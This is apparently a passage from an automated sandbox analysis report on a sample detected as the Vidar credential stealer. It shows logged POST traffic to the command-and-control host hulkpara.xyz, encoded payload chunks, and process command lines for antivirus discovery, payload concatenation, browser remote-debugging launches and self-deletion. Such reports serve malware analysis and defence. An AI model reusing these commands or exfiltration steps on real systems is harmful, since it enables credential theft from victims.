2024-12-18 20:09:51 UTC	16355	OUT	Data Raw: 55 55 55 55 41 46 46 46 46 41 42 53 55 74 46 41 43 55 55 55 55 41 46 4a 53 30 55 41 4a 52 52 52 51 41 55 6c 4c 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 42 6f 6f 4e 41 43 55 55 55 55 41 46 46 46 46 41 43 55 55 74 4a 51 41 6c 46 4c 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 53 47 6c 70 44 51 41 55 55 55 55 41 46 4a 53 30 6c 41 42 51 61 4b 4b 41 45 6f 70 61 53 67 41 6f 6f 6f 6f 41 4b 53 6c 6f 6f 41 53 69 69 69 67 42 4b 4b 57 6b 6f 41 4b 4b 4b 4b 41 45 6f 6f 6f 6f 41 4b 53 6c 70 4b 41 43 6b 70 61 53 67 41 6f 6f 6f 6f 41 31 36 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 53 76 4d 66 69 55 76 38 41 59 2f 69 7a 77 78 34 6d 58 68 49 70 78 62 7a 74 2f 73 35 7a 2f Data Ascii: UUUUAFFFFABSUtFACUUUUAFJS0UAJRRRQAUlLRQAlFFFABRRRQAUUUUAFBooNACUUUUAFFFFACUUtJQAlFLRQAlFFFABRRRQAlFFFABRRRQAlFFFABRRRQAlFFFABSGlpDQAUUUUAFJS0lABQaKKAEopaSgAooooAKSlooASiiigBKKWkoAKKKKAEooooAKSlpKACkpaSgAooooA16KKKACiiigAooooASvMfiUv8AY/izwx4mXhIpxbzt/s5z/
2024-12-18 20:09:51 UTC	16355	OUT	Data Raw: 58 74 35 66 52 74 48 6d 5a 34 57 4f 6c 7a 56 62 64 69 56 66 61 70 56 2b 74 51 67 31 49 44 58 71 4a 48 46 59 6e 55 38 31 4b 6f 79 61 69 58 72 55 79 34 37 35 6f 73 5a 76 79 46 78 6e 33 71 49 75 38 54 5a 51 6b 56 30 57 6c 65 48 70 62 77 43 57 34 4a 53 49 39 42 33 4e 64 52 44 34 61 30 6c 49 67 72 57 6f 6b 39 53 35 35 72 68 72 59 36 6c 42 38 75 35 32 55 73 42 55 71 4b 37 30 4f 4a 73 72 78 5a 78 74 59 34 63 56 63 48 31 72 62 31 48 77 66 61 4d 50 4f 73 43 59 5a 6c 35 41 37 47 73 44 4d 6b 55 6a 52 54 4c 74 6b 55 34 59 56 35 39 53 74 43 57 73 54 48 45 59 57 56 46 33 65 78 4d 4b 73 78 4e 7a 56 51 4e 79 4b 6d 6a 50 4e 65 64 56 6c 71 63 36 4e 69 32 63 35 46 62 31 72 4a 6c 4b 35 6d 32 62 70 57 37 5a 53 56 77 54 33 4c 6a 6f 58 37 75 50 7a 37 4f 52 44 32 55 6b 66 57 75 Data Ascii: Xt5fRtHmZ4WOlzVbdiVfapV+tQg1IDXqJHFYnU81KoyaiXrUy475osZvyFxn3qIu8TZQkV0WleHpbwCW4JSI9B3NdRD4a0lIgrWok9S55rhrY6lB8u52UsBUqK70OJsrxZxtY4cVcH1rb1HwfaMPOsCYZl5A7GsDMkUjRTLtkU4YV59StCWsTHEYWVF3exMKsxNzVQNyKmjPNedVlqc6Ni2c5Fb1rJlK5m2bpW7ZSVwT3LjoX7uPz7ORD2UkfWu
2024-12-18 20:09:51 UTC	16355	OUT	Data Raw: 4c 77 73 59 6a 79 55 75 4a 6c 7a 39 4a 47 72 71 5a 66 38 41 56 50 37 71 66 35 56 7a 50 77 2f 50 2f 45 69 6e 2f 77 43 76 79 66 38 41 39 47 4e 51 42 31 66 57 69 6c 48 53 69 67 42 4b 4b 4b 4b 41 43 6b 6f 70 61 41 45 78 53 55 74 4c 51 41 32 6b 7a 54 73 55 6d 4b 41 4f 48 31 35 64 33 6a 37 54 51 41 54 2b 37 42 50 48 75 61 36 31 77 32 7a 39 32 71 37 6a 30 7a 58 4f 61 68 6b 66 45 4b 7a 32 70 76 50 32 5a 75 50 7a 72 6f 50 4e 75 63 38 32 35 78 37 4d 4b 74 45 4d 57 52 6c 69 69 33 4f 42 6e 67 48 61 4b 52 49 59 34 77 46 7a 79 54 6e 6b 30 65 5a 50 2f 77 41 2b 72 66 38 41 66 61 31 45 42 4f 58 4c 79 51 4d 78 42 79 76 7a 44 69 71 4a 4c 47 7a 50 51 44 30 36 30 30 49 33 6e 4e 6b 4c 73 2f 68 48 70 51 5a 4a 2b 76 32 5a 76 2b 2b 68 52 35 73 2f 48 2b 6a 4e 7a 2f 74 69 67 43 4e Data Ascii: LwsYjyUuJlz9JGrqZf8AVP7qf5VzPw/P/Ein/wCvyf8A9GNQB1fWilHSigBKKKKACkopaAExSUtLQA2kzTsUmKAOH15d3j7TQAT+7BPHua61w2z92q7j0zXOahkfEKz2pvP2ZuPzroPNuc825x7MKtEMWRlii3OBngHaKRIY4wFzyTnk0eZP/wA+rf8Afa1EBOXLyQMxByvzDiqJLGzPQD0600I3nNkLs/hHpQZJ+v2Zv++hR5s/H+jNz/tigCN
2024-12-18 20:09:51 UTC	16355	OUT	Data Raw: 70 78 64 6d 6d 4e 53 6c 73 39 6a 48 62 56 72 39 4a 4d 4e 5a 6c 6c 55 34 4f 31 54 79 66 38 4d 59 71 5a 74 59 6d 55 74 2f 6f 45 70 41 58 63 4d 44 72 57 76 67 65 67 78 52 67 65 67 34 36 56 73 68 47 44 4c 72 56 32 34 68 4d 46 6c 49 43 78 47 34 4d 4f 67 72 63 58 4a 55 45 39 78 54 73 44 47 4f 50 79 6f 41 34 70 67 4a 53 5a 70 39 4a 69 67 44 6b 37 67 2f 38 58 4c 73 76 2b 76 52 76 36 31 31 31 63 66 65 6e 62 38 53 62 48 2f 72 30 62 2b 74 64 50 35 68 39 61 41 4c 4f 52 54 66 78 71 44 7a 50 65 6b 33 6d 67 43 63 39 61 53 6f 64 35 6f 38 77 30 41 53 45 6d 6d 6d 6f 7a 49 61 54 64 51 41 2b 6b 4a 46 4d 4a 4e 4d 4c 55 41 50 4c 55 77 6d 6d 46 36 4e 31 41 44 73 30 30 6d 6d 6c 71 61 57 6f 41 63 54 54 53 61 61 54 52 6e 69 67 42 63 30 32 6b 7a 53 5a 6f 41 55 6d 6d 35 70 43 61 54 Data Ascii: pxdmmNSls9jHbVr9JMNZllU4O1Tyf8MYqZtYmUt/oEpAXcMDrWvgegxRgeg46VshGDLrV24hMFlICxG4MOgrcXJUE9xTsDGOPyoA4pgJSZp9JigDk7g/8XLsv+vRv6111cfenb8SbH/r0b+tdP5h9aALORTfxqDzPek3mgCc9aSod5o8w0ASEmmmozIaTdQA+kJFMJNMLUAPLUwmmF6N1ADs00mmlqaWoAcTTSaaTRnigBc02kzSZoAUmm5pCaT
2024-12-18 20:09:51 UTC	16355	OUT	Data Raw: 49 72 68 6c 74 35 70 2f 47 46 6e 64 4a 70 51 67 6b 2b 33 53 72 63 46 64 4e 6c 44 6d 50 5a 49 75 58 75 53 64 72 71 33 79 6b 4b 42 67 5a 55 5a 34 35 62 46 59 57 2b 6e 36 4a 4c 59 4c 6f 4b 4b 57 31 47 58 37 51 58 30 75 53 61 4e 55 33 79 4e 47 78 6a 51 44 7a 6c 78 74 41 77 53 46 79 44 78 6a 46 48 53 34 33 76 62 2b 75 76 2b 52 36 46 52 58 50 2b 43 34 5a 37 66 77 36 73 4d 38 54 52 62 4c 69 66 79 30 61 46 6f 51 45 38 78 69 75 45 59 6b 71 75 4d 59 47 54 67 59 72 6f 4b 47 49 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 66 52 53 55 55 41 46 46 46 46 41 42 53 64 71 57 6b 6f 41 57 6b 6f 6f 6f 41 4b 4b 53 69 67 42 61 53 69 69 67 41 6f 6f 6f 6f 41 4b 4b 53 69 67 42 61 4b Data Ascii: Irhlt5p/GFndJpQgk+3SrcFdNlDmPZIuXuSdrq3ykKBgZUZ45bFYW+n6JLYLoKKW1GX7QX0uSaNU3yNGxjQDzlxtAwSFyDxjFHS43vb+uv+R6FRXP+C4Z7fw6sM8TRbLify0aFoQE8xiuEYkquMYGTgYroKGIKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAfRSUUAFFFFABSdqWkoAWkoooAKKSigBaSiigAooooAKKSigBaK
2024-12-18 20:09:51 UTC	83	OUT	Data Raw: 4d 59 36 56 7a 39 46 46 4d 41 71 35 4a 2f 79 42 62 58 2f 41 4b 2b 4a 76 2f 51 59 36 70 31 63 6b 2f 35 41 74 72 2f 31 38 54 66 2b 67 78 30 41 66 2f 2f 5a 0d 0a 2d 2d 2d 2d 2d 2d 4f 48 4c 36 38 51 31 36 46 55 53 4a 4d 37 59 55 4b 36 46 55 2d 2d 0d 0a Data Ascii: MY6Vz9FFMAq5J/yBbX/AK+Jv/QY6p1ck/5Atr/18Tf+gx0Af//Z------OHL68Q16FUSJM7YUK6FU--
2024-12-18 20:09:53 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 20:09:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-18 20:09:53 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.9	49869	94.130.191.168	443	7852	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:54 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----U3E3EC2VAAAIEUKFK6XB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: hulkpara.xyz Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-18 20:09:54 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 55 33 45 33 45 43 32 56 41 41 41 49 45 55 4b 46 4b 36 58 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 61 31 36 30 65 62 33 65 61 31 31 66 65 32 65 36 38 34 31 38 31 33 62 39 33 63 37 39 38 64 0d 0a 2d 2d 2d 2d 2d 2d 55 33 45 33 45 43 32 56 41 41 41 49 45 55 4b 46 4b 36 58 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 55 33 45 33 45 43 32 56 41 41 41 49 45 55 4b 46 4b 36 58 42 0d 0a 43 6f 6e 74 Data Ascii: ------U3E3EC2VAAAIEUKFK6XBContent-Disposition: form-data; name="token"7fa160eb3ea11fe2e6841813b93c798d------U3E3EC2VAAAIEUKFK6XBContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------U3E3EC2VAAAIEUKFK6XBCont
2024-12-18 20:09:55 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 20:09:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-18 20:09:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.9	49871	94.130.191.168	443	7852	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:57 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DTJEUS2DTRQQIMOZMYMO User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: hulkpara.xyz Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-18 20:09:57 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 61 31 36 30 65 62 33 65 61 31 31 66 65 32 65 36 38 34 31 38 31 33 62 39 33 63 37 39 38 64 0d 0a 2d 2d 2d 2d 2d 2d 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 4f 0d 0a 43 6f 6e 74 Data Ascii: ------DTJEUS2DTRQQIMOZMYMOContent-Disposition: form-data; name="token"7fa160eb3ea11fe2e6841813b93c798d------DTJEUS2DTRQQIMOZMYMOContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------DTJEUS2DTRQQIMOZMYMOCont
2024-12-18 20:09:58 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 20:09:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-18 20:09:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	15:08:05
Start date:	18/12/2024
Path:	C:\Users\user\Desktop\QIo3SytSZA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\QIo3SytSZA.exe"
Imagebase:	0x400000
File size:	884'502 bytes
MD5 hash:	1F4548AAC2C166BACD286C6F5243908F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:08:05
Start date:	18/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy Adjacent Adjacent.cmd & Adjacent.cmd
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:08:05
Start date:	18/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:08:07
Start date:	18/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xfa0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:08:07
Start date:	18/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0xc60000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:08:07
Start date:	18/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xfa0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:08:07
Start date:	18/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0xc60000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:08:08
Start date:	18/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 415434
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:08:08
Start date:	18/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "Analyze" Arabic
Imagebase:	0xc60000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:08:08
Start date:	18/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Reflected + ..\Subdivision + ..\Change + ..\Checked o
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:08:08
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com
Wow64 process (32bit):	true
Commandline:	Vibrators.com o
Imagebase:	0x9f0000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.1708990346.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.1708846807.0000000000F23000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2507233828.00000000039B1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2507233828.00000000039B1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2504350523.0000000000F03000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2504350523.0000000000F03000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2504454906.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2504454906.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.1708781553.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:08:09
Start date:	18/12/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xb10000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	15:08:55
Start date:	18/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff6b2cb0000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	15:08:57
Start date:	18/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=1988,i,7571485263199981070,11501263835013036309,262144 /prefetch:8
Imagebase:	0x7ff6b2cb0000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	15:09:10
Start date:	18/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff6d8030000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	15:09:10
Start date:	18/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2812 --field-trial-handle=2520,i,303125913703440342,5402026303497311183,262144 /prefetch:3
Imagebase:	0x7ff6d8030000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	15:09:11
Start date:	18/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff6d8030000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	15:09:11
Start date:	18/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2044,i,15636258417430532003,11558248929672306327,262144 /prefetch:3
Imagebase:	0x7ff6d8030000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	15:09:21
Start date:	18/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff6d8030000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	15:09:22
Start date:	18/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2580 --field-trial-handle=2460,i,15708646645341395724,7971815597723476352,262144 /prefetch:3
Imagebase:	0x7ff6d8030000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	15:09:22
Start date:	18/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff6d8030000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	15:09:22
Start date:	18/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=1976,i,13259116394525614172,17189080494392434811,262144 /prefetch:3
Imagebase:	0x7ff6d8030000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	15:09:26
Start date:	18/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5636 --field-trial-handle=1976,i,13259116394525614172,17189080494392434811,262144 /prefetch:8
Imagebase:	0x7ff6d8030000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	15:09:26
Start date:	18/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6596 --field-trial-handle=1976,i,13259116394525614172,17189080494392434811,262144 /prefetch:8
Imagebase:	0x7ff6d8030000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	15:09:57
Start date:	18/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\415434\Vibrators.com" & rd /s /q "C:\ProgramData\WBIEKNG4E3WB" & exit
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	15:09:57
Start date:	18/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
